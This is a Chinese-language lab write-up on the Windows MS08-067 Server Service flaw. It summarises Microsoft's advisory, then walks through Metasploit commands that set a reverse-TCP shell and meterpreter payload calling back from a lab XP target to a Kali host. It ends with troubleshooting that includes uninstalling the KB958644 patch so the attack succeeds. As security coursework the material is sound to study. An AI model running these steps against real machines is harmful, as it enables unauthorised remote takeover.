簡單介紹一下漏洞
ms08-067 編輯 討論 MS08-067漏洞將會影響除Windows Server 2008 Core以外的所有Windows系統,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta。 中文名 ms08-067 外文名 ms08-067 發布日期: 2008/10/22 下載大小: 因操作系統而異 類 別 漏洞 說明:微軟安全公告KB958644 漏洞影響:服務器服務中的漏洞可能允許遠程執行代碼 發布日期:2008/10/22 下載大小:因操作系統而異。 受影響的操作系統: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 摘要 此安全更新解決了服務器服務中一個秘密報告的漏洞。 如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用於進行蠕蟲攻擊。 防火牆最佳做法和標准的默認防火牆配置有助於保護網絡資源免受從企業外部發起的攻擊。可以通過安裝本 Microsoft 更新程序來保護計算機不受侵害。安裝后,可能必須重新啟動計算機。 嚴重等級:Windows 2000;XP;Server 2003為嚴重,Windows Vista;Server 2008;7 Beta為重要。
0X02實戰
靶機ip 192.168.1.134 windows
攻擊機 192.168.1.137 kali
先嘗試一下能不能ping通
能ping通
MS08_067遠程漏洞攻擊實踐:Shell
1、在kali終端中開啟msfconsole。
2然后找這個漏洞的利用方法
msf5 > search ms08_067 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
3、輸入命令use exploit/windows/smb/ms08_067_netapi
,進入該漏洞模塊的使用。
4、輸入命令show payload
會顯示出有效的攻擊載荷,如下圖所示,我們找到一個shell_reverse_tcp。
5、命令show targets
會顯示出可以被攻擊的靶機的操作系統型號,如下圖所示:
6、使用命令set payload generic/shell_reverse_tcp
設置攻擊有效載荷。
7、輸入命令show options
顯示我們需要在攻擊前需要設置的數據,如下圖紅框圈住的部分。
8、輸入命令
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.137 LHOST => 192.168.1.137 msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.1.134 RHOST => 192.168.134
然后9、輸入命令exploit
開始攻擊,如下圖所示是正常攻擊成功結果。
返回seesion就可以拿到shell
Seeion –L
就你可以看見這個shell
Seeions –I 1
進入shell
下面是轉的別人的
MS08_067遠程漏洞攻擊實踐:meterpreter
1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi
,進入ms08_067漏洞模塊。
2、設置payload:set payload windows/meterpreter/reverse_tcp
3、show options
,查看需要設置的ip地址,如下圖所示,是已經設置好的
4、成功攻擊結果:
5、執行ifconfig
,查看靶機地址:
6、ps
查看進程:
7、meterpreter轉shell:
實驗中遇到的問題
1、在做實驗的時候用老師的xp系統作為靶機,但是在exploit的時候顯示如下:no session was created。
2、手動設置一個set session 1
,結果還是不成功。
3、在exploit
前,使用check
查看靶機狀態,返回以下信息,表明目標主機是安全的,不能被攻擊。
4、網上查到可以卸載ms08_067的補丁,即卸載KB958644,文件路徑:c:/windows找到KB958644(這是個隱藏文件),打開卸載exe程序,如下:
5、重啟后,還是不能成功,最后找了一個英文版的win xp sp 3 ,才成功完成。